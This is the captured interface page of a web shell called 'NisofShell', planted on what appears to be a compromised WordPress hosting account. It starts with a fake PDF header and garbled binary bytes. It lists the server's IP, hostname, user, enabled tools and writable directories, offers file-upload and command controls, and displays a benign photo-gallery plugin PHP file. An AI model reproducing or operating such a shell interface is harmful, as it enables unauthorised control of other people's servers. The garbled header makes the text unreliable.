%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Nisof Was Here
NisofShell
Server IP : 54.36.91.62  /  Your IP : 216.73.217.162
Web Server : Apache
System : Linux webm002.cluster127.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : wellingtpa ( 97533)
PHP Version : 7.4.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wellingtpa/wellingtonrecord/wp-content/plugins/photo-gallery/booster/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/wellingtpa/wellingtonrecord/wp-content/plugins/photo-gallery/booster//Gutenberg.php
<?php

/**
 * Class TWBBWGGutenberg
 */
class TWBBWGGutenberg {
  private $booster;
  function __construct($booster) {
    $this->booster = $booster;
    add_action('enqueue_block_editor_assets', array($this, 'register_scripts'));
  }

  /**
   * Register scripts.
   *
   * @return void
   */
  public function register_scripts() {
    wp_enqueue_script(TenWebBoosterBWG::PREFIX . '-gutenberg', $this->booster->plugin_url . '/assets/js/gutenberg/gutenberg-compiled.js', array(
      'wp-plugins',
      'wp-edit-post'
    ), TenWebBoosterBWG::VERSION);
    wp_localize_script(TenWebBoosterBWG::PREFIX . '-gutenberg', 'twb', array(
      'cta_button' => $this->booster->cta_button,
      'href' => $this->booster->submenu_url,
    ));
    wp_enqueue_style(TenWebBoosterBWG::PREFIX . '-global');
    if ( $this->booster->cta_button['button_color'] || $this->booster->cta_button['text_color'] ) {
      wp_add_inline_style(TenWebBoosterBWG::PREFIX . '-global', '.twb-custom-button, .twb-custom-button:hover {background-color: ' . $this->booster->cta_button['button_color'] . ' !important; color: ' . $this->booster->cta_button['text_color'] . ' !important;}');
    }
  }
}

Anon7 - 2022
AnonSec Team